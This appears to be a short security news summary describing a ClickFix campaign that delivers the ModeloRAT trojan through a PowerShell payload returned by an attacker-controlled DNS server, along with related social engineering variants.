Threat actors have developed an innovative ClickFix campaign that leverages DNS lookups to distribute malicious payloads, marking the first known use of this technique in such social engineering attacks. Victims are instructed to run the nslookup command against an attacker-controlled DNS server rather than their default provider, which returns a PowerShell script embedded within the DNS response. This script is then automatically executed on the compromised device, ultimately installing the ModeloRAT remote access trojan.
The attack chain begins when users are tricked into opening the Windows Run dialog and executing a specifically crafted nslookup command. The response from the malicious DNS server contains a "NAME:" field holding the second-stage PowerShell payload, which downloads additional components including a ZIP archive with Python executables. Persistence mechanisms are established through VBScript files placed in the AppData directory and startup folder shortcuts.
This approach represents a significant evolution from traditional ClickFix methods that typically retrieve payloads via HTTP, as DNS-based delivery allows attackers to modify payloads dynamically while blending with normal network traffic. Microsoft researchers observed this campaign targeting victims through unknown lures, though the technique demonstrates increasing sophistication in evasion tactics.
ClickFix attacks have undergone rapid diversification over the past year, expanding beyond basic PowerShell execution to include browser-based JavaScript campaigns and OAuth application abuse. Recent variants have exploited shared AI platform pages from ChatGPT and Claude to promote fraudulent guides, while another campaign used Pastebin comments to trick cryptocurrency users into executing malicious code directly within their browsers during exchange visits. These developments highlight the growing adaptability of threat actors in social engineering techniques across multiple operating systems and applications.
Read more...